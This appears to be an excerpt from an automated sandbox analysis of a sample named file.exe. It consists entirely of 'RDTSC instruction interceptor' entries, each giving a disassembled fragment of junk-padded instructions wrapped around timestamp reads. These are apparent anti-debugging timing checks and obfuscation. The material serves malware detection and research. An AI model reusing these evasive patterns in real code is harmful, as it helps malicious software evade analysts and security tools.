                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2ACB second address: 5A2AEA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3F24EE26FAh 0x00000008 jg 00007F3F24EE26F6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 jne 00007F3F24EE26FCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2AEA second address: 5A2AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2AF1 second address: 5A2AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2C68 second address: 5A2C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3F244F40D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2C75 second address: 5A2C9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 jbe 00007F3F24EE2706h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2C9C second address: 5A2CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40DEh 0x00000009 popad 0x0000000a jnp 00007F3F244F40E5h 0x00000010 jmp 00007F3F244F40DFh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2287 second address: 5A228C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A228C second address: 5A2293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A2293 second address: 5A2299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A31FC second address: 5A3244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F3F244F40E5h 0x0000000a popad 0x0000000b jmp 00007F3F244F40E8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F3F244F40DFh 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A3244 second address: 5A324D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A77A2 second address: 5A77A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A77A8 second address: 5A77BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3F24EE26FEh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7A8B second address: 5A7ACC instructions: 0x00000000 rdtsc 0x00000002 je 00007F3F244F40D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F3F244F40DCh 0x00000010 jnc 00007F3F244F40D6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 push ebx 0x0000001a jmp 00007F3F244F40DEh 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pop ebx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edi 0x00000027 pop edi 0x00000028 push eax 0x00000029 pop eax 0x0000002a jng 00007F3F244F40D6h 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A7ACC second address: 5A7AD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F3F24EE26F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A80A8 second address: 5A80D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F3F244F40E9h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A8614 second address: 5A8676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F24EE2700h 0x00000009 jmp 00007F3F24EE2705h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jng 00007F3F24EE26F6h 0x0000001c popad 0x0000001d pushad 0x0000001e jo 00007F3F24EE26F6h 0x00000024 pushad 0x00000025 popad 0x00000026 js 00007F3F24EE26F6h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F3F24EE2708h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A87E7 second address: 5A87F3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3F244F40DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AFC56 second address: 5AFC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A0CA second address: 55162A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 nop 0x00000007 pushad 0x00000008 sbb esi, 03940097h 0x0000000e mov ah, E5h 0x00000010 popad 0x00000011 call dword ptr [ebp+122D2D48h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pop eax 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A604 second address: 3C176E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3F24EE26FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cx, 6AB2h 0x0000000f push dword ptr [ebp+122D0691h] 0x00000015 sub dword ptr [ebp+122D198Bh], edx 0x0000001b call dword ptr [ebp+122D1EFCh] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D1E93h], ebx 0x00000028 xor eax, eax 0x0000002a cld 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f pushad 0x00000030 mov ecx, dword ptr [ebp+122D2804h] 0x00000036 xor bx, 3321h 0x0000003b popad 0x0000003c mov dword ptr [ebp+122D2978h], eax 0x00000042 jmp 00007F3F24EE26FDh 0x00000047 mov esi, 0000003Ch 0x0000004c mov dword ptr [ebp+122D1F18h], edx 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 jmp 00007F3F24EE2702h 0x0000005b lodsw 0x0000005d mov dword ptr [ebp+122D1E93h], ecx 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 ja 00007F3F24EE270Ah 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 jmp 00007F3F24EE2703h 0x00000076 cld 0x00000077 nop 0x00000078 jng 00007F3F24EE2702h 0x0000007e jns 00007F3F24EE26FCh 0x00000084 push eax 0x00000085 push ecx 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56A9E3 second address: 56A9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AA7E second address: 56AA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B482 second address: 5520B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F3F244F40D8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 clc 0x00000027 call dword ptr [ebp+122D2F4Ch] 0x0000002d jmp 00007F3F244F40DCh 0x00000032 push eax 0x00000033 push edx 0x00000034 je 00007F3F244F40F2h 0x0000003a jp 00007F3F244F40D6h 0x00000040 jmp 00007F3F244F40E6h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B31CD second address: 5B31D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B31D3 second address: 5B31D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B31D9 second address: 5B31E3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3F24EE26F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B38E5 second address: 5B38F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40DAh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B38F6 second address: 5B38FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C00 second address: 5B3C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F244F40E0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C14 second address: 5B3C1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3C1A second address: 5B3C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6FBF second address: 5B6FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3F24EE26F6h 0x0000000a pop ecx 0x0000000b jmp 00007F3F24EE2709h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6FE3 second address: 5B6FF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F244F40DDh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6889 second address: 5B68C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3F24EE2709h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jmp 00007F3F24EE26FEh 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6A46 second address: 5B6A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6A4E second address: 5B6A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9343 second address: 5B9381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3F244F40DEh 0x00000011 jmp 00007F3F244F40E1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B9381 second address: 5B939F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2705h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B939F second address: 5B93A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524E1C second address: 524E4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2704h 0x00000007 jnp 00007F3F24EE26F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F3F24EE26FBh 0x00000015 pushad 0x00000016 popad 0x00000017 pop edi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524E4C second address: 524E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD23D second address: 5BD276 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3F24EE2706h 0x0000000e jmp 00007F3F24EE2703h 0x00000013 js 00007F3F24EE26F6h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD690 second address: 5BD697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD697 second address: 5BD6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3F24EE26FBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD6A6 second address: 5BD6CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3F244F40E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD6CA second address: 5BD6D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD6D0 second address: 5BD6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD96E second address: 5BD976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD976 second address: 5BD99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F3F244F40DAh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3F244F40E5h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD99C second address: 5BD9A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C365F second address: 5C3666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C1FD5 second address: 5C1FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C25A1 second address: 5C25A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C25A9 second address: 5C25AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C26F0 second address: 5C26FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3F244F40DAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C26FF second address: 5C270A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C270A second address: 5C270E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56AE8A second address: 56AEA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F3F24EE26F6h 0x00000009 jc 00007F3F24EE26F6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F3F24EE26F8h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C284D second address: 5C2867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3F244F40E5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2867 second address: 5C2886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F24EE2702h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6A9F second address: 5C6AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6AA3 second address: 5C6AB1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3F24EE26F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6AB1 second address: 5C6AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6AB5 second address: 5C6ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FBh 0x00000007 jnl 00007F3F24EE26F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6C1D second address: 5C6C39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40E3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C6D7B second address: 5C6D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3F24EE2700h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD6D7 second address: 5CD6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E4h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD6F0 second address: 5CD719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3F24EE26FFh 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jng 00007F3F24EE26FCh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD719 second address: 5CD71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDCEC second address: 5CDCF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDCF2 second address: 5CDCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDCF6 second address: 5CDCFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CDFA7 second address: 5CDFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007F3F244F40DEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jne 00007F3F244F40D6h 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE58A second address: 5CE58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE58E second address: 5CE5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F3F244F40D6h 0x0000000e jnp 00007F3F244F40D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEBAA second address: 5CEBC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2704h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEBC4 second address: 5CEBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEBCA second address: 5CEBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE6E second address: 5CEE7D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3F244F40D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE7D second address: 5CEE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F3F24EE26F6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE8D second address: 5CEE91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEE91 second address: 5CEEA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F3F24EE26F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEEA2 second address: 5CEEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEEBB second address: 5CEEC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jl 00007F3F24EE2702h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CEEC9 second address: 5CEECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D37D5 second address: 5D37D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65B5 second address: 5D65C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40DCh 0x00000009 pop ecx 0x0000000a rdtsc
